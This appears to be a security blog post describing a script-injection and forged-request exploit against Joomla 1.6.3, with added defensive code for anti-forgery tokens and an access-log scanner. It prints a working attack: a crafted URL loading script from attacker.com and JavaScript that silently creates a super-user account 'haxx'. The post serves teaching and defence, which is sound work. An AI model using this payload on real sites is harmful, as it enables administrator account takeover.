CSRF Exploit for Joomla 1.6.3 or Lower

A new exploit has been published targeting Joomla 1.6.3 and lower. The vulnerability allows an attacker to create a specially crafted URL that executes arbitrary script code in the victim's browser.

Cross-site request forgery (XSRF or CSRF) is a web application attack that abuses the existing trust relationship between a web application and its authenticated users to force those users to commit arbitrary sensitive transactions on behalf of an attacker.
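The defence that breaks this trust relationship is to require something the browser does not attach automatically: a per-session anti-forgery token embedded in the form and checked on submission, optionally backed by an Origin/Referer check. The following is an added example, not Joomla's code; the site origin, session store and request model are assumptions constructed for the demonstration.

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://victim.example"  # hypothetical site, not from the page

# In-memory session store: session cookie value -> session data.
# A stand-in for real server-side session storage (assumption, not Joomla's code).
SESSIONS = {}


@dataclass
class Request:
    """Minimal model of an incoming HTTP request: what the browser sends."""
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


def login():
    """Create an authenticated session and return the cookie value the browser stores.
    The anti-forgery token is generated once per session and leaves the server
    only inside pages served to that same session."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": "admin", "csrf_token": secrets.token_hex(16)}
    return sid


def render_user_form(sid):
    """The server embeds the session's token in the form as a hidden field.
    Only a page served by the site itself (same origin) can read it back out."""
    return {"csrf_token": SESSIONS[sid]["csrf_token"]}


def handle_save_user(req):
    """Handler for the 'save user' submission. Returns (status, message)."""
    session = SESSIONS.get(req.cookies.get("session"))
    if session is None:
        return 403, "not authenticated"
    # Check 1: when the browser sends Origin or Referer, it must name our own site.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is not None and not source.startswith(SITE_ORIGIN):
        return 403, "cross-site request rejected"
    # Check 2: the submitted token must equal the one stored server-side.
    # Cookies are attached by the browser automatically; this field is not.
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "missing or invalid anti-forgery token"
    return 200, f"user {req.form.get('username', '?')} saved"


def demo():
    """One legitimate and two forged submissions; returns their status codes."""
    sid = login()
    good = Request(cookies={"session": sid},
                   form={"username": "alice", **render_user_form(sid)},
                   headers={"Origin": SITE_ORIGIN})
    # Forged: the session cookie rides along automatically, but a page on the
    # attacker's origin cannot read the token, so the field is absent.
    forged = Request(cookies={"session": sid}, form={"username": "haxx"},
                     headers={"Origin": "https://attacker.example"})
    # Forged without an Origin header: the token check alone still rejects it.
    forged_no_origin = Request(cookies={"session": sid}, form={"username": "haxx"})
    return [handle_save_user(r)[0] for r in (good, forged, forged_no_origin)]


if __name__ == "__main__":
    print(demo())  # [200, 403, 403]
```

One caveat matters for the scenario in this post: the token stops a forgery mounted from a foreign origin, but script that is already executing inside the site's own origin (as the crafted URL achieves here) can read the iframe's form, token included, and copy it. The token check is therefore a defence in depth; removing the script injection itself (the upgrade) is the fix.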

The attack scenario can be as follows: the attacker creates a malicious HTML page on a system under his control that may contain a JavaScript file, joom163.js, which the crafted URL injects into the vulnerable page:

http://vulnerablewebsite.com/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://attacker.com/joom163.js></script>

The JavaScript contains the following code:

[javascript]
// A hidden iframe loads the administrator "edit user" form inside the victim's
// authenticated session; onload hands control to read() once the form exists.
document.writeln('<iframe id="iframe" src="http://victim.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" onload="read()"></iframe>');

function read()
{
    var name = "Test";
    var username = "haxx";
    var password = "test123";
    var email = "fake _at_ gmail.com";

    // The script runs in the site's own origin, so it can reach into the iframe's DOM.
    var doc = document.getElementById("iframe").contentDocument;
    var form = doc.forms[0];

    form.jform_name.value = name;
    form.jform_username.value = username;
    form.jform_password.value = password;
    form.jform_password2.value = password;
    form.jform_email.value = email;
    // Tick the group checkbox (looked up on the document: a form element has no getElementById).
    doc.getElementById("1group_8").checked = true;
    // Fire the click handler of the anchor that saves (submits) the form.
    doc.getElementsByTagName("a")[11].onclick();
}
[/javascript]

By visiting the vulnerable page, the authenticated user unknowingly executes JavaScript that, in the background, creates an HTTP GET request that creates a super user account (username="haxx", password="test123"); of course, any cookies associated with that domain, port, and path are automatically attached to the HTTP header and sent along with the request.
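Two traces of this attack land in the web server's access log: the crafted front-end URL carrying script markup in a query parameter, and, shortly after, the administrator user-edit page being requested with a Referer that points at the public site (the hidden iframe's embedding page). The scanner below is an added example, not from the post or the Joomla project; the log lines are constructed in combined log format with hypothetical hosts, and the Referer-based signal is a heuristic that a legitimate administrator navigating from the front end can also trigger.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample lines (combined log format, hypothetical hosts; not from the page).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2011:12:00:01 +0000] "GET /index.php?option=com_contact&view=category'
    '&catid=26&id=36&Itemid=-1%22%3B%27%3E%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fattacker.example'
    '%2Fjoom163.js%3E%3C%2Fscript%3E HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jun/2011:12:00:02 +0000] "GET /index.php?option=com_contact&view=category'
    '&catid=26&id=36&Itemid=1 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jun/2011:12:00:05 +0000] "GET /administrator/index.php?option=com_users'
    '&view=user&layout=edit HTTP/1.1" 200 7710 "http://victim.example/index.php?option=com_contact'
    '&view=category&catid=26&id=36" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Markup that has no business inside a query parameter of a Joomla component URL.
MARKUP_RE = re.compile(r'<\s*/?\s*(script|iframe|img|svg)\b|javascript\s*:', re.IGNORECASE)


def decode_target(target):
    """URL-decode twice so double-encoded payloads (%253C...) are seen as well."""
    return unquote_plus(unquote_plus(target))


def scan_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None  # not a combined-format line; skip
    rec = m.groupdict()
    parts = urlsplit(decode_target(rec["target"]))
    base = {"ip": rec["ip"], "ts": rec["ts"], "path": parts.path, "param": None}

    # Signal 1: script markup inside any query parameter (split manually so the
    # result does not depend on the Python version's treatment of ';' separators).
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if MARKUP_RE.search(key + "=" + value):
            return {**base, "reason": "script_markup_in_query", "param": key}

    # Signal 2 (heuristic): an /administrator/ page fetched with a Referer that is
    # not itself under /administrator/, which is what a front-end iframe load produces.
    referer = rec["referer"]
    if parts.path.startswith("/administrator/") and referer not in ("", "-") \
            and "/administrator/" not in referer:
        return {**base, "reason": "admin_page_loaded_from_frontend_referer"}
    return None


def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; a correlated pair of findings from the same client IP within a few seconds is a strong indication that the crafted URL was delivered to a logged-in user.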

To fix the vulnerability, upgrade to Joomla! 1.6.4 or higher.
